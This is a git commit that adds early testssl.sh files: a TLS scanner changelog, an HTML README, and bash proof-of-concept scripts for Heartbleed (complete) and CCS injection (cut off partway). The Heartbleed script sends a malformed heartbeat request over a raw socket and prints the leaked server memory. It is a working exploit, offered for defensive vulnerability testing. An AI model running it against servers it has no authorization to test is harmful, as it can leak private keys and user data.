- first try to commit here
This commit is contained in:
parent
ed895bde26
commit
9a689bbffc
|
@ -0,0 +1,313 @@
|
|||
|
||||
2.0 includes:
|
||||
|
||||
* major release, new features:
|
||||
* SNI
|
||||
* STARTTLS fully supported
|
||||
* RC4 check
|
||||
* (P)FS check
|
||||
* SPDY check
|
||||
* color codes make more sense now
|
||||
* cipher hexcodes are shown
|
||||
* tests ciphers per protocol
|
||||
* HSTS
|
||||
* web and application server banner
|
||||
* server prefereences
|
||||
* TLS server extensions
|
||||
* server key size
|
||||
* cipher suite mapping from openssl to RFC
|
||||
* heartbleed check
|
||||
* CCS injection check
|
||||
|
||||
---------------------
|
||||
Details:
|
||||
|
||||
1.106
|
||||
- minor fixes
|
||||
|
||||
1.105
|
||||
- NEW: working prototype for CCS injection
|
||||
|
||||
1.104
|
||||
- NEW: everywhere *also* RFC style ciphers -- if the mapping file is found
|
||||
- unitary calls to display cipher suites
|
||||
|
||||
1.103
|
||||
- NEW: telnet support for STARTTLS (works only with a patched openssl version)
|
||||
--> not tested (lack of server)
|
||||
|
||||
1.102
|
||||
- NEW: test for BREACH (experimental)
|
||||
|
||||
1.101
|
||||
- BUGFIX: muted too verbose output of which on CentOS/RHEL
|
||||
- BUGFIX: muted too verbose output of netcat/nc on CentOS/RHEL+Debian
|
||||
|
||||
1.100
|
||||
- further cleanup
|
||||
- starttls now tests allciphers() instead of cipher_per_proto
|
||||
(normal use case makes most sense here)
|
||||
- ENV J_POSITIV --> SHOW_EACH_C
|
||||
- finding mapping-rfc.txt is now a bit smarter
|
||||
- preparations for ChaCha20-Poly1305 (would have provided binaries but
|
||||
"openssl s_client -connect" with that ciphersuite fails currently with
|
||||
a handshake error though client and server hello succeeded!)
|
||||
|
||||
1.99
|
||||
- BUGFIX: now really really everywhere testing the IP with supplied name
|
||||
- locking out openssl < 0.9.8f, new function called "old_fart" ;-)
|
||||
- FEATURE: displaying PTR record of IP
|
||||
- FEATURE: displaying further IPv4/IPv6 addresses
|
||||
- bit of a cleanup
|
||||
|
||||
1.98
|
||||
- http_header is in total only called once
|
||||
- better parsing of default protocol (FIXME shouldn't appear anymore)
|
||||
|
||||
1.97
|
||||
- reduced sleep time for server hello and payload reply (heartbleed)
|
||||
|
||||
1.96
|
||||
- NEW: (experimental) heartbleed support with bash sockets (shell only SSL handshake!)
|
||||
see also https://testssl.sh/bash-heartbleed.sh
|
||||
|
||||
1.95 (2.0rc3)
|
||||
- changed cmdline options for CRIME and renego vuln to uppercase
|
||||
- NEW: displays server key size now
|
||||
- NEW: displays TLS server extensions (might kill old openssl versions)
|
||||
- brown warning if HSTS < 180 days
|
||||
- brown warning if SSLv3 is offered as default protocol
|
||||
|
||||
1.94
|
||||
- NEW: prototype of mapping to RFC cipher suite names, needed file mapping-rfc.txt in same dir
|
||||
as of now only used for 'testssl.sh -V'
|
||||
- internal renaming: it was supposed to be "cipherlists" instead of "ciphersuites"
|
||||
- additional tests for cipherlists DES, 3DES, ADH
|
||||
|
||||
1.93
|
||||
- BUGFIX: removed space in Server banner fixed (at the expense of showing just nothing if Server string is empty)
|
||||
|
||||
1.92
|
||||
- BUGFIX: fixed error of faulty detected empty server string
|
||||
|
||||
1.91
|
||||
- replaced most lcyan to brown (=not really bad but somehow)
|
||||
- empty server string better displayed
|
||||
- prefered CBC TLS 1.2 cipher is now brown (lucky13)
|
||||
|
||||
1.90
|
||||
- fix for netweaver banner (server is lowercase)
|
||||
- no server banner is no disadvantage (color code)
|
||||
- 1 more blank proto check
|
||||
- server preference is better displayed
|
||||
|
||||
1.89
|
||||
- reordered! : protocols + cipher come first
|
||||
- colorized prefered server preference (e.g. CBC+RC4 is light red now, TLSv1.2 green)
|
||||
- SSLv3 is now light cyan
|
||||
- NEW: -P|--preference now in help menu
|
||||
- light cyan is more appropriate than red for HSTS
|
||||
|
||||
1.88
|
||||
- NEW: prototype for protocol and cipher preference
|
||||
- prototype for session ticket
|
||||
|
||||
1.87
|
||||
- changed just the version string to rc1
|
||||
|
||||
1.86
|
||||
- NEW: App banner now production, except 2 liners
|
||||
- DEBUG: 1 is now true as everywhere else
|
||||
- CRIME+Renego prettier
|
||||
- last optical polish for RC4, PFS
|
||||
|
||||
1.85
|
||||
- NEW: appbanner (also 2 lines like asp.net)
|
||||
- OSSL_VER_MAJOR/MINOR/APPENDIX
|
||||
- less bold because bold headlines as bold should be reserved for emphasize findings
|
||||
- tabbed output also for protocols and cipher classes
|
||||
- unify neat printing
|
||||
|
||||
1.84
|
||||
- NEW: deprecating openssl version <0.98
|
||||
- displaying a warning >= 0.98 < 1.0
|
||||
- NEW: neat print also for all ciphers (-E,-e)
|
||||
|
||||
1.83
|
||||
- BUGFIX: results from unit test: logical error in PFS+RC4 fixed
|
||||
- headline of -V / PFS+RC4 ciphers unified
|
||||
|
||||
1.82
|
||||
- NEW: output for -V now better (bits seperate, spacing improved)
|
||||
|
||||
1.81
|
||||
- output for RC4+PFS now better (with headline, bits seperate, spacing improved)
|
||||
- both also sorted by encr. strength .. umm ..err bits!
|
||||
|
||||
1.80
|
||||
- order of finding supplied binary extended (first one wins):
|
||||
1. use supplied variable $OPENSSL
|
||||
2. use "openssl" in same path as testssl.sh
|
||||
3. use "openssl.`uname -m`" in same path as testssl.sh
|
||||
4. use anything in system $PATH (return value of "which"
|
||||
|
||||
1.79
|
||||
- STARTTLS options w/o trailing 's' now (easier)
|
||||
- commented code for CRIME SPDY
|
||||
- issue a warning for openssl < 0.9.7 ( that version won't work anyway probably)
|
||||
- NPN protos as a global var
|
||||
- pretty print with fixed columns: PFS, RC4, allciphers, cipher_per_proto
|
||||
|
||||
1.78
|
||||
- -E, -e now sorted by encryption strength (note: it's only encr key length)
|
||||
- -V now pretty prints all local ciphers
|
||||
- -V <pattern> now pretty prints all local ciphers matching pattern (plain string, no regex)
|
||||
- bugfix: SSLv2 cipher hex codes has 3 bytes!
|
||||
|
||||
1.77
|
||||
- removed legacy code (PROD_REL var)
|
||||
|
||||
1.76
|
||||
- bash was gone!! desaster for Ubuntu, fixed
|
||||
- starttls+rc4 check: bottom line was wrong
|
||||
- starttls had too much output (certificate) at first a/v check
|
||||
|
||||
1.75
|
||||
- location is now https://testssl.sh
|
||||
- be nice: banner, version, help also works for BSD folks (on dash)
|
||||
- bug in server banner fixed
|
||||
- sneaky referer and user agent possible
|
||||
|
||||
1.74
|
||||
- Debian 7 fix
|
||||
- ident obsoleted
|
||||
|
||||
1.72
|
||||
- removed obsolete GREP
|
||||
- SWURL/SWCONTACT
|
||||
- output for positive RC4 better
|
||||
|
||||
1.71
|
||||
- workaround for buggy bash (RC4)
|
||||
- colors improved
|
||||
- blue is now reserved for headline
|
||||
- magenta for local probs
|
||||
- in RC4 removal of SSL protocol provided by openssl
|
||||
|
||||
1.70
|
||||
- DEBUG in http_headers now as expected
|
||||
- <?xml marker as HTML body understood
|
||||
|
||||
1.69
|
||||
- HTTP 1.1 header
|
||||
- removed in each cipher the proto openssl is returning
|
||||
+ NEW: cipher_per_proto
|
||||
|
||||
1.68
|
||||
- header parser for openssl
|
||||
- HSTS
|
||||
- server banner string
|
||||
- vulnerabilities closer+condensed
|
||||
|
||||
1.68
|
||||
- header parser for openssl
|
||||
- HSTS
|
||||
- server banner string
|
||||
- vulnerabilities closer+condensed
|
||||
|
||||
1.67
|
||||
- signal green if no SSLv3
|
||||
- cipher hex code now in square brackets
|
||||
|
||||
|
||||
[..]
|
||||
|
||||
|
||||
1.36
|
||||
* fixed issue while connecting to non-webservers
|
||||
|
||||
1.35
|
||||
* fixed portability issue on Ubuntu
|
||||
|
||||
1.34
|
||||
* ip(v4) address in output, helps to tell different systems apart later on
|
||||
* local hostname in output
|
||||
|
||||
1.31 (Halloween Release)
|
||||
* bugfix: SSLv2 was kind of borken
|
||||
* now it works for sure but ssl protocol are kind of ugly
|
||||
|
||||
1.30b (25.10.2012)
|
||||
* bugfix: TLS 1.1/1.2 may lead to false negatives
|
||||
* bugfix: CMDLINE -a/-e was misleading, now similar to help menu
|
||||
|
||||
1.3 (10/13/2012)
|
||||
* can test now for cipher suites only
|
||||
* can test now for protocols suites only
|
||||
* tests for tls v1.1/v1.2 of local openssl supports it
|
||||
* commandline "all "is rename to "each-cipher"
|
||||
* banner when it's done
|
||||
|
||||
1.21a (10/4/2012)
|
||||
* tests whether openssl has support for zlib compiled so that it avoids a false negative
|
||||
|
||||
1.21 (10/4/2012)
|
||||
* CRIME support
|
||||
|
||||
1.20b
|
||||
* bugfixed release
|
||||
|
||||
1.20a
|
||||
* code cleanup
|
||||
* showciphers variable introduced: only show ciphers if this is set (it is by
|
||||
default now and there's a comment
|
||||
* openssl version + path to it in the banner
|
||||
|
||||
|
||||
1.20
|
||||
* bugfix (ssl in ssl handshake failure is sometimes too much)
|
||||
* date in output
|
||||
* autodetection of CVS version removed
|
||||
|
||||
1.19
|
||||
* bugfix
|
||||
|
||||
1.18
|
||||
* Rearragement of arguments: URL comes now always last!
|
||||
* small code cleanups for readability
|
||||
* individual cipher test is now with bold headline, not blue
|
||||
* NOPARANOID flag tells whether medium grade ciphers are ok. NOW they are (=<1.17 was paranoid)
|
||||
|
||||
1.17
|
||||
* SSL tests now for renegotiation vulnerabilty!
|
||||
* version detection of testssl.sh
|
||||
* program has a banner
|
||||
* fixed bug leading to a file named "1"
|
||||
* comment for 128Bit ciphers
|
||||
|
||||
1.16
|
||||
* major code cleanups
|
||||
* cmd line options: port is now in first argument!!
|
||||
* help is more verbose
|
||||
* check whether on other server side is ssl server listening
|
||||
* https:// can be now supplied also on the command line
|
||||
* test all ciphers now
|
||||
* new cleanup routine
|
||||
* -a does not do standard test afterward, you need to run testssl a second
|
||||
time w/o -a if you want this
|
||||
|
||||
1.12
|
||||
* tests also medium grade ciphers (which you should NOT use)
|
||||
* tests now also high grade ciphers which you SHOULD ONLY use
|
||||
* switch for more verbose output of cipher for those cryptographically interested .
|
||||
in rows: SSL version, Key eXchange, Authentication, Encryption and Message Authentication Code
|
||||
* this is per default enabled (provide otherwise "" as VERB_CLIST)
|
||||
* as a courtesy I am providing 64+32 Linux binaries for testing 56 Bit ciphers
|
||||
|
||||
1.11
|
||||
* Hint for howto enable 56 Bit Ciphers
|
||||
* possible to specify where openssl is (hardcoded, $ENV, last resort: auto)
|
||||
* warns if netcat is not there
|
||||
|
||||
1.10
|
||||
* somewhat first released version
|
|
@ -0,0 +1,160 @@
|
|||
<br>
|
||||
<strong>testssl.sh</strong> is a <a href="LICENSE.txt" title="GPL v2">free</a> Unix command line tool which checks a server's service
|
||||
on any port for the support of TLS/SSL ciphers, protocols as well as some cryptographic flaws.
|
||||
It's designed to provide clear output for a "is this good or bad" decision.
|
||||
|
||||
<br><br>
|
||||
<a href="testssl-standard.png"><img src="testssl-standard.50p.png" title="Standard call: testssl.sh <hostname>"
|
||||
onmouseover="this.src='testssl-standard.png'" onmouseout="this.src='testssl-standard.50p.png';"
|
||||
style="box-shadow: 0 5px 5px 5px #AAAAAA; border: 0px solid; margin-left:25px; margin-right:15px; margin-bottom:10px; float:right" alt="Standard call: testssl.sh <hostname>"></a>
|
||||
It is working on every Linux distribution which has OpenSSL installed. As for security reasons some distributors
|
||||
outphase the buggy stuff – and this is exactly you want to check for – it's recommended to compile OpenSSL by
|
||||
yourself or check out the OpenSSL binaries below (Linux). You will get a warning though if your OpenSSL client
|
||||
cannot perform a specific check, see below.
|
||||
|
||||
<br>
|
||||
<br>
|
||||
testssl.sh is portable, it is supposed to work on
|
||||
any other Unix system (preferably with GNU tools) and on cygwin, supposed it can find the OpenSSL binary.
|
||||
|
||||
<br><br>
|
||||
<strong>New features</strong>
|
||||
<ul>
|
||||
<li>2.0: Features: <ul>
|
||||
<li>SNI</li>
|
||||
<li>STARTTLS</li>
|
||||
<li>server preferences for protocols and ciphers</li>
|
||||
<li>checks for: RC4, PFS, SPDY</li>
|
||||
<li>web and app server banner, HSTS</li>
|
||||
<li>server key size</li>
|
||||
<li>TLS session tickets</li>
|
||||
<li>TLS server extensions</li>
|
||||
<li>heartbleed check from <a href="https://testssl.sh/bash-heartbleed.sh">bash-heartbleed.sh</a> with shell only SSL handshake!</li>
|
||||
<li>CCS check from <a href="https://testssl.sh/ccs-injection.sh">ccs-injection.sh</a> with shell only SSL handshake!</li>
|
||||
<li>somewhat smart check for BREACH vulnerability</li>
|
||||
<li>prelease of cipher suites name space mapping OpenSSL <--> RFC</li>
|
||||
<li>aaand: neat output</li>
|
||||
</ul
|
||||
</li>
|
||||
<li>1.40: cleanups, path of URL supplied on the command line (is ignored for now) </li>
|
||||
<li>1.30: can test now for cipher suites / protocols only, tests for tls v1.1/v1.2 , -a/--all renamed </li>
|
||||
<li>1.21: CRIME support, see http://threatpost.com/en_us/blogs/new-attack-uses-ssltls-information-leak-hijack-https-sessions-090512.</li>
|
||||
<li>1.18: Rearragement of arguments: URI comes now always last. NOPARANOID flag tells whether medium grade ciphers are ok. </li>
|
||||
<li>1.17: tests now for renegotiation vulnerabity, see (<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3555" target="_blank" title="opens in new tab/window">CVE-2009-3555)</a></li>
|
||||
<li>1.16: Invoking options changed with this release. Port and hostname / URL will be accepted only as one argument. major code cleanups. Also
|
||||
checks now whether SSL is listening on the server side at all. <i>-a</i>/<i>--all</i> tests cipher by cipher now.</li>
|
||||
<li>[..]</li>
|
||||
<li>More see <a href="CHANGELOG.txt">CHANGELOG</a>.</li>
|
||||
</ul>
|
||||
|
||||
<p style="clear:left"></p>
|
||||
<br><br>
|
||||
|
||||
<strong>Calling</strong>
|
||||
|
||||
<br><br>
|
||||
Starting testssl.sh with no params will give you a clue how to use it:
|
||||
|
||||
<a href="testssl-E.png"><img src="testssl-E.33p.png" title="check each ciphers per protocol" onmouseover="this.src='testssl-E.png'" onmouseout="this.src='testssl-E.33p.png';"
|
||||
style="box-shadow: 0 5px 5px 5px #AAAAAA; border: 0px solid; margin-left:10px; margin-bottom:10px; margin-right:25px; float:right" alt="check each ciphers per protocol"></a>
|
||||
<pre>userid@<strong>somehost</strong>:~ % testssl.sh
|
||||
|
||||
testssl.sh <options> URI
|
||||
|
||||
where <options> is <strong>one</strong> of
|
||||
|
||||
<-h|--help> what you're looking at
|
||||
<-b|--banner> displays banner + version
|
||||
<-v|--version> same as above
|
||||
<-V|--local> pretty print all local ciphers
|
||||
<-V|--local> <hexcode> what cipher is <pattern hexcode>?
|
||||
|
||||
<-e|--each-cipher> check each local ciphers remotely
|
||||
<-E|-ee|--cipher-per-proto> check those per protocol
|
||||
<-f|--ciphers> check cipher suites
|
||||
<-p|--protocols> check TLS/SSL protocols only
|
||||
<-P|--preference> displays the servers picks: protocol+cipher
|
||||
<-y|--spdy> checks for SPDY/NPN
|
||||
<-B|--heartbleed> tests only for heartbleed vulnerability
|
||||
<-I|--ccs|--ccs_injection> tests only for CCS injection vulnerability
|
||||
<-R|--renegotiation> tests only for renegotiation vulnerability
|
||||
<-C|--crime> tests only for CRIME vulnerability
|
||||
<-T|--breach> tests only for BREACH vulnerability
|
||||
<-s|--pfs|--fs|--nsa> checks (perfect) forward secrecy settings
|
||||
<-4|--rc4|--appelbaum> which RC4 ciphers are being offered?
|
||||
<-H|--header|--headers> check for HSTS and server banner string
|
||||
|
||||
URI is host|host:port|URL|URL:port
|
||||
(port 443 is assumed unless otherwise specified)
|
||||
|
||||
<-t|--starttls> host:port <ftp|smtp|pop3|imap|xmpp|telnet> *) <SNI hostname>
|
||||
|
||||
*) for STARTTLS telnet support you need a patched openssl version (to be provided soon)
|
||||
|
||||
userid@<strong>somehost</strong>:~ %</pre>
|
||||
|
||||
Normal use case is probably just "testssl.sh <hostname>", see first picture above. "testssl.sh -E <hostname>" was used in the
|
||||
second picture above. A STARTTLS check (see last picture) would be achieved with e.g.
|
||||
<pre>
|
||||
testssl.sh --starttls <smtphostname>.<tld>:587 smtp
|
||||
testssl.sh -t <jabberhostname>.<tld>:5222 xmpp
|
||||
testssl.sh --starttls <pophostname>.<tld>:110 pop3
|
||||
</pre>
|
||||
As the help says: Currently only one option at a time works.
|
||||
<br>
|
||||
A maybe neat feature: If you want to find out what local ciphers you have and
|
||||
print them pretty, use "testssl.sh -V". Ever wondered what hexcode a cipher is?
|
||||
"testssl.sh -V 9f" lets you search for the hexcode 9f. If you have the file
|
||||
"mapping-rfc.txt" in the same directory "testssl.sh -V" <a
|
||||
href="https://twitter.com/drwetter/status/456126567547039744/photo/1"
|
||||
title="picture" target="_blank">displays</a> the matching RFC style cipher
|
||||
suite name. Also during every cipher suite test the corresponding RFC style name is
|
||||
displayed. It's a broad output. If you don't want this, you need to move mapping-rfc.txt
|
||||
away -- for now.
|
||||
<br><br> Got it so far? Good. <br>
|
||||
|
||||
<a href="testssl-starttls-localssl.png"><img src="testssl-starttls-localssl.25p.png" title="STARTTLS check with Ubuntu's 12.04 OpenSSL"
|
||||
onmouseover="this.src='testssl-starttls-localssl.png'" onmouseout="this.src='testssl-starttls-localssl.25p.png'"
|
||||
style="box-shadow: 0 5px 5px 5px #AAAAAA; border: 0px solid; margin-left:10px; margin-bottom:10px; margin-right:35px; margin-top:15px; float:left" alt="STARTTLS check with Ubuntu's 12.04 OpenSSL, no recompiled OpenSSL"></a>
|
||||
<br>
|
||||
<br>
|
||||
<strong>Hint regarding OpenSSL binary</strong>
|
||||
|
||||
<br><br>
|
||||
As mentioned above, a prerequisite for thoroughly checking SSL/TLS enabled servers is: all you want to check for has to be
|
||||
available on your client. Transport encryption is not only depending on the server but also on your crypto provider on the client side –
|
||||
especially if you want to use it for testing.
|
||||
So there are drawbacks out of the Linux distributions boxes -- so to speak:
|
||||
<ul>
|
||||
<li> one cannot check 56 Bit ciphers as they are disabled during compile time. </li>
|
||||
<li> some ciphers are disabled for security reasons, </li>
|
||||
<li> support maybe not included (to disable CRIME)</li>
|
||||
<li> and last but not least: SSLv2 seems to be outphased too, <a href="https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/955675" title="Ubuntu's Lauchpad: not even the manpage is updated since 2 years" target="_blank">Ubuntu</a> started this.</li>
|
||||
</ul>
|
||||
Thus the <a href="openssl-1.0.2-beta1.linux64_32bit.tar.gz.asc" title="GPG signed">signed</a> tarball provides specially compiled statically linked (except glibc and the loader)
|
||||
<a href="openssl-1.0.2-beta1.linux64_32bit.tar.gz">OpenSSL binaries</a> as a courtesy. If you don't want this, you'll get a warning in magenta, see picture on the right hand side.
|
||||
You'll need to unpack the binaries, dump the one you need either in the same location as testssl.sh, named just "openssl" or "openssl.`uname -m`".
|
||||
You can also tell testssl.sh via environment variable where your openssl binary is:
|
||||
<pre>export OPENSSL=<path_to_myopenssl></pre> before you use testssl. Or issue <pre>OPENSSL=<path_to_myopenssl> testssl.sh <hostname></pre>
|
||||
|
||||
Don't try outdated OpenSSL versions before 1.0! Those versions are deprecated, you likely will not get very far. testssl.sh is not locking
|
||||
those out but things might not work as expected. Support will be retired soon.
|
||||
|
||||
|
||||
<br><br>
|
||||
<strong>Misc</strong>
|
||||
|
||||
<br><br>
|
||||
Feedback, bugs and contributions are appreciated, see contact in <a href="testssl.sh" type="text/plain">testssl.sh</a> (<i>dirk aet testssl dot sh</i>).
|
||||
<br><br>
|
||||
|
||||
I post all significant updates on Twitter (<a href="http://twitter.com/drwetter" title="@drwetter" target="_blank">@drwetter</a>).
|
||||
|
||||
<br>
|
||||
<br>
|
||||
<div style="color: #999999; font-size: 11px; text-align: right;"><a href="http://drwetter.eu/neu/impressum.shtml">Imprint</a> </div>
|
||||
<hr>
|
||||
<br>
|
||||
<!-- $Id: README.html,v 1.35 2014/06/15 20:07:18 dirkw Exp $ -->
|
||||
</html>
|
||||
</body>
|
|
@ -0,0 +1,23 @@
|
|||
1.7, 2014-04-30 23:06:55 +0200;
|
||||
- legal disclaimer
|
||||
----------------------------
|
||||
1.6 2014-04-18 14:01:19 +0200;
|
||||
- possible to supply URLs now
|
||||
- cleanup
|
||||
----------------------------
|
||||
1.5, 2014-04-18 11:01:51 +0200;
|
||||
- broader ascii output
|
||||
- back at 64k
|
||||
----------------------------
|
||||
1.4, 2014-04-15 21:56:47 +0200;
|
||||
- few comments for educational purposes added
|
||||
----------------------------
|
||||
1.3,
|
||||
- retrieves data
|
||||
----------------------------
|
||||
1.2, 2014-04-15 20:58:55 +0200;
|
||||
- PoC complete
|
||||
----------------------------
|
||||
1.1, 2014-04-15 20:47:48 +0200;
|
||||
- Initial version
|
||||
|
|
@ -0,0 +1,145 @@
|
|||
#!/bin/bash
|
||||
|
||||
# POC bash socket implementation of heartbleed (CVE-2014-0160), see also http://heartbleed.com/
|
||||
# Author: Dirk Wetter, GPLv2 see https://testssl.sh/LICENSE.txt
|
||||
#
|
||||
# sockets inspired by http://blog.chris007.de/?p=238
|
||||
# heartbleed mainly adapted from https://gist.github.com/takeshixx/10107280
|
||||
#
|
||||
###### DON'T DO EVIL! USAGE AT YOUR OWN RISK. DON'T VIOLATE LAWS! #######
|
||||
|
||||
NODE=""
|
||||
SLEEP=2
|
||||
COL_WIDTH=32
|
||||
|
||||
[ -z "$1" ] && exit 1
|
||||
|
||||
# TLS 1.0=x01 1.1=0x02, 1.2=0x3
|
||||
# the PoC contains per default only check for TLS1.0 as the is the least common denominator
|
||||
TLSV=${2:-x01}
|
||||
|
||||
heartbleed_payload="\x18\x03\tls_version\x00\x03\x01\x40\x00"
|
||||
## ^^^^^^^ this is the thing!
|
||||
|
||||
client_hello="
|
||||
# TLS header ( 5 bytes)
|
||||
,x16, # Content type (x16 for handshake)
|
||||
x03, tls_version, # TLS Version
|
||||
x00, xdc, # Length
|
||||
# Handshake header
|
||||
x01, # Type (x01 for ClientHello)
|
||||
x00, x00, xd8, # Length
|
||||
x03, tls_version, # TLS Version
|
||||
# Random (32 byte) Unix time etc, see www.moserware.com/2009/06/first-few-milliseconds-of-https.html
|
||||
x53, x43, x5b, x90, x9d, x9b, x72, x0b,
|
||||
xbc, x0c, xbc, x2b, x92, xa8, x48, x97,
|
||||
xcf, xbd, x39, x04, xcc, x16, x0a, x85,
|
||||
x03, x90, x9f, x77, x04, x33, xd4, xde,
|
||||
x00, # Session ID length
|
||||
x00, x66, # Cipher suites length
|
||||
# Cipher suites (51 suites)
|
||||
xc0, x14, xc0, x0a, xc0, x22, xc0, x21,
|
||||
x00, x39, x00, x38, x00, x88, x00, x87,
|
||||
xc0, x0f, xc0, x05, x00, x35, x00, x84,
|
||||
xc0, x12, xc0, x08, xc0, x1c, xc0, x1b,
|
||||
x00, x16, x00, x13, xc0, x0d, xc0, x03,
|
||||
x00, x0a, xc0, x13, xc0, x09, xc0, x1f,
|
||||
xc0, x1e, x00, x33, x00, x32, x00, x9a,
|
||||
x00, x99, x00, x45, x00, x44, xc0, x0e,
|
||||
xc0, x04, x00, x2f, x00, x96, x00, x41,
|
||||
xc0, x11, xc0, x07, xc0, x0c, xc0, x02,
|
||||
x00, x05, x00, x04, x00, x15, x00, x12,
|
||||
x00, x09, x00, x14, x00, x11, x00, x08,
|
||||
x00, x06, x00, x03, x00, xff,
|
||||
x01, # Compression methods length
|
||||
x00, # Compression method (x00 for NULL)
|
||||
x00, x49, # Extensions length
|
||||
# Extension: ec_point_formats
|
||||
x00, x0b, x00, x04, x03, x00, x01, x02,
|
||||
# Extension: elliptic_curves
|
||||
x00, x0a, x00, x34, x00, x32, x00, x0e,
|
||||
x00, x0d, x00, x19, x00, x0b, x00, x0c,
|
||||
x00, x18, x00, x09, x00, x0a, x00, x16,
|
||||
x00, x17, x00, x08, x00, x06, x00, x07,
|
||||
x00, x14, x00, x15, x00, x04, x00, x05,
|
||||
x00, x12, x00, x13, x00, x01, x00, x02,
|
||||
x00, x03, x00, x0f, x00, x10, x00, x11,
|
||||
# Extension: SessionTicket TLS
|
||||
x00, x23, x00, x00,
|
||||
# Extension: Heartbeat
|
||||
x00, x0f, x00, x01, x01
|
||||
"
|
||||
msg=`echo "$client_hello" | sed -e 's/# .*$//g' -e 's/,/\\\/g' | sed -e 's/ //g' | tr -d '\n'`
|
||||
|
||||
|
||||
parse_hn_port() {
|
||||
PORT=443 # unless otherwise auto-determined, see below
|
||||
NODE="$1"
|
||||
|
||||
# strip "https", supposed it was supplied additionally
|
||||
echo $NODE | grep -q 'https://' && NODE=`echo $NODE | sed -e 's/https\:\/\///' `
|
||||
|
||||
# strip trailing urlpath
|
||||
NODE=`echo $NODE | sed -e 's/\/.*$//'`
|
||||
|
||||
# determine port, supposed it was supplied additionally
|
||||
echo $NODE | grep -q ':' && PORT=`echo $NODE | sed 's/^.*\://'` && NODE=`echo $NODE | sed
|
||||
's/\:.*$//'`
|
||||
}
|
||||
|
||||
socksend() {
|
||||
data=`echo $1 | sed 's/tls_version/'"$2"'/g'`
|
||||
echo "\"$data\""
|
||||
echo -en "$data" >&5 &
|
||||
sleep $SLEEP
|
||||
}
|
||||
|
||||
sockread()
|
||||
{
|
||||
reply=`dd bs=$1 count=1 <&5 2>/dev/null`
|
||||
}
|
||||
|
||||
|
||||
#### main
|
||||
|
||||
parse_hn_port "$1"
|
||||
|
||||
if ! exec 5<> /dev/tcp/$NODE/$PORT; then
|
||||
echo "`basename $0`: unable to connect to $NODE:$PORT"
|
||||
exit 2
|
||||
fi
|
||||
# socket is now open with fd 5
|
||||
|
||||
|
||||
|
||||
echo "##### sending client hello:"
|
||||
socksend "$msg" $TLSV
|
||||
|
||||
sockread 10000
|
||||
echo "##### server hello:"
|
||||
echo -e "$reply" | xxd | head -20
|
||||
echo "[...]"
|
||||
echo
|
||||
|
||||
echo "##### sending payload with TLS version $TLSV:"
|
||||
socksend $heartbleed_payload $TLSV
|
||||
|
||||
sockread 65534
|
||||
echo "###### heartbleed reply: "
|
||||
echo -e "$reply" | xxd -c$COL_WIDTH
|
||||
echo
|
||||
|
||||
lines_returned=`echo -e "$reply" | xxd | wc -l`
|
||||
if [ $lines_returned -gt 1 ]; then
|
||||
tput bold; tput setaf 1; echo "VULNERABLE"; tput sgr0
|
||||
ret=1
|
||||
else
|
||||
tput bold; tput setaf 2; echo "ok"; tput sgr0
|
||||
ret=0
|
||||
fi
|
||||
echo
|
||||
|
||||
exit $ret
|
||||
|
||||
# vim:tw=100:ts=5:sw=5
|
||||
# $Id: bash-heartbleed.sh,v 1.6 2014/04/18 12:01:19 dirkw Exp $
|
|
@ -0,0 +1,186 @@
|
|||
#!/bin/bash
|
||||
|
||||
# POC bash socket implementation of CCS Injection vulnerability in OpenSSL (CVE-2014-0224), see https://www.openssl.org/news/secadv_20140605.txt
|
||||
# Author: Dirk Wetter, GPLv2 see https://testssl.sh/LICENSE.txt
|
||||
#
|
||||
# sockets inspired by http://blog.chris007.de/?p=238
|
||||
# mainly adapted from the C code from https://gist.github.com/rcvalle/71f4b027d61a78c42607
|
||||
# thx Ramon de C Valle
|
||||
#
|
||||
###### DON'T DO EVIL! USAGE AT YOUR OWN RISK. DON'T VIOLATE LAWS! #######
|
||||
|
||||
NODE=""
|
||||
SLEEP=2
|
||||
DEBUG=${DEBUG:-0}
|
||||
|
||||
[ -z "$1" ] && exit 1
|
||||
|
||||
# TLS 1.0=x01 1.1=0x02, 1.2=0x3
|
||||
# the PoC contains per default only check for TLS1.0 as the is the least common denominator
|
||||
TLSV=${2:-x01}
|
||||
|
||||
ccs_message="\x14\x03\tls_version\x00\x01\x01"
|
||||
## ^^^^^^^ this is the thing!
|
||||
|
||||
client_hello="
|
||||
# TLS header ( 5 bytes)
|
||||
,x16, # Content type (x16 for handshake)
|
||||
x03, tls_version, # TLS Version
|
||||
x00, x93, # Length
|
||||
# Handshake header
|
||||
x01, # Type (x01 for ClientHello)
|
||||
x00, x00, x8f, # Length
|
||||
x03, tls_version, # TLS Version
|
||||
# Random (32 byte) Unix time etc, see www.moserware.com/2009/06/first-few-milliseconds-of-https.html
|
||||
x53, x9c, xb2, xcb, x4b,
|
||||
x42, xf9, x2d, x0b, xe5, x9c, x21, xf5, xa3, x89, xca, x7a, xd9, xb4, xab, x3f,
|
||||
xd3, x22, x21, x5e, xc4, x65, x0d, x1e, xce, xed, xc2,
|
||||
x00, # Session ID length
|
||||
x00, x68, # Cipher suites length
|
||||
xc0, x13,
|
||||
xc0, x12,
|
||||
xc0, x11,
|
||||
xc0, x10,
|
||||
xc0, x0f,
|
||||
xc0, x0e,
|
||||
xc0, x0d,
|
||||
xc0, x0c,
|
||||
xc0, x0b,
|
||||
xc0, x0a,
|
||||
xc0, x09,
|
||||
xc0, x08,
|
||||
xc0, x07,
|
||||
xc0, x06,
|
||||
xc0, x05,
|
||||
xc0, x04,
|
||||
xc0, x03,
|
||||
xc0, x02,
|
||||
xc0, x01,
|
||||
x00, x39,
|
||||
x00, x38,
|
||||
x00, x37,
|
||||
x00, x36,
|
||||
x00, x35,
|
||||
x00, x34,
|
||||
x00, x33,
|
||||
x00, x32,
|
||||
x00, x31,
|
||||
x00, x30,
|
||||
x00, x2f,
|
||||
x00, x16,
|
||||
x00, x15,
|
||||
x00, x14,
|
||||
x00, x13,
|
||||
x00, x12,
|
||||
x00, x11,
|
||||
x00, x10,
|
||||
x00, x0f,
|
||||
x00, x0e,
|
||||
x00, x0d,
|
||||
x00, x0c,
|
||||
x00, x0b,
|
||||
x00, x0a,
|
||||
x00, x09,
|
||||
x00, x08,
|
||||
x00, x07,
|
||||
x00, x06,
|
||||
x00, x05,
|
||||
x00, x04,
|
||||
x00, x03,
|
||||
x00, x02,
|
||||
x00, x01,
|
||||
x01, x00"
|
||||
|
||||
msg=`echo "$client_hello" | sed -e 's/# .*$//g' -e 's/,/\\\/g' | sed -e 's/ //g' | tr -d '\n'`
|
||||
|
||||
|
||||
parse_hn_port() {
|
||||
